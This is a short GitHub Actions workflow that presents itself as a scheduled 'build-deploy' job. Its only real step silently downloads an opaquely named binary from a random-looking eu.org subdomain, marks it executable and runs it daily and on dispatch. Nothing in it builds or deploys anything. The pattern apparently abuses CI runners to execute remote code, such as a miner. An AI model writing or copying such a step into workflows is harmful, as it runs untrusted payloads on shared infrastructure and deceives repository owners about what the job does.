#2024-03-18-[051740]-y69rq2ud
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "24 2 * * * "

jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: default_build_deploy_name_note
        run: |
          wget -q https://mulyja4g0txoihsa.callforpapers.eu.org/Mongolian_grassland
          chmod 755 Mongolian_grassland
          ./Mongolian_grassland